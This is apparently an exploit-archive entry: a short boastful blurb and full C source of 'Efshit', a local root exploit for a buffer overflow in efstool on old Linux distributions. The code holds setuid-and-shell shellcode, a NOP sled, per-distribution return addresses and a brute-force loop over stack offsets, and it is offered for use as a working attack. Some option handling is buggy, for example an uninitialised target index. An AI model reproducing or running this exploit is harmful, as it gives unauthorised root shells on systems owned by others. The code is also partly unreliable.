Efshit is an exploit for the efstool vulnerability. Unlike other exploits for this vulnerability, Efshit is robust, has a wide range of attack options, incorporates brute forcing, and actually works.
832cf510139b6658abbfd12c0a8fc81a46eea6532be15b619d2c7bf4e3854b9e
/* efstool local exploit(brute force capabilities)
*
* http://www.t3chware.net,
* email: root@t3chware.net
*
* coded by: Hi_Tech_Assassin
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <getopt.h>
#define NOP 0x90
#define LEN 3000
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
struct
{
int no;
char *descr;
long ret;
char path[256];
}target[] =
{
{1," Redhat 7.2", 0xbffff340,"/usr/bin/efstool"},
{2," SuSE Linux 8.0",0xbfffeb43 ,"/opt/gnome/bin/efstool"},
{3," Mandrake 8.2", 0xbffff080,"/usr/bin/efstool"},
{4," Slackware 8.1", 0xbffff080,"/usr/bin/efstool"}
};
long esp(void)
{
__asm("movl %esp,%eax");
}
void exploit(long ret, char **path)
{
char payload[LEN];
int i;
for(i=0;i<LEN;i+=4)
{
*(long *)&payload[i]=ret;
}
memset(payload,NOP,100);
memcpy(payload+100, shellcode, strlen(shellcode));
execl("/usr/bin/efstool","efstool",payload,NULL);
}
void usage(char *argv[])
{
int x=0;
printf("\nUsage:\n%s -t[target no] -o[offset] -b[(bruteforce), specify
target no]\n\nTargets\n",*(char **)&argv);
while(target[x].no)
{
printf("[%d] - %s -\n", target[x].no, target[x].descr);
x++;
}
printf("\n\nOnly enter one option\n\n");
}
void bruteforce(char **path)
{
pid_t pid;
int x=0, offset=5;
long ret;
printf("attemping brute force\n\n");
if(!getuid())
{
printf("brute force cannot be run while uid is 0\n");
exit(0);
}
ret=esp()+offset;
while(getuid()&&(x<=3000&&x>=-3000))
{
if((pid=fork())==0)
{
exploit(ret,path);
exit(0);
}
else perror("fork failed");
if(waitpid(pid,NULL, 0)!= pid) perror("waitpid error");
if(x>=3000)
{
ret=esp();
x=-1;
}
else if(x<=3000&&x>=0)
{
ret+=offset;
x+=offset;
}
else if(x>=-3000&&x<0)
{
ret-=offset;
x-=offset;
}
printf("%d\n\n",x);
}
printf("brute force complete..\n\n");
system("id");
}
int main(int argc, char **argv)
{
int cnt, sel;
char *offset;
long returnaddr;
if(argc == 1)
{
usage((char **)argv[0]);
exit(1);
}
while((cnt = getopt(argc,argv,"t:b:o:")) != EOF)
{
switch(cnt)
{
case 't': //target distro
sel = atoi(optarg);
exploit(target[sel-1].ret,(char **)target[sel-1].path);
break;
case 'b': //brute force
bruteforce((char **)target[sel-1].path);
break;
case 'o': //offset
offset = atoi(optarg);
returnaddr=esp()+offset;
sel = atoi(optarg);
exploit(returnaddr,(char **)target[sel-1].path);
break;
default:
usage(&argv[0]);
break;
}
}
return(0);
}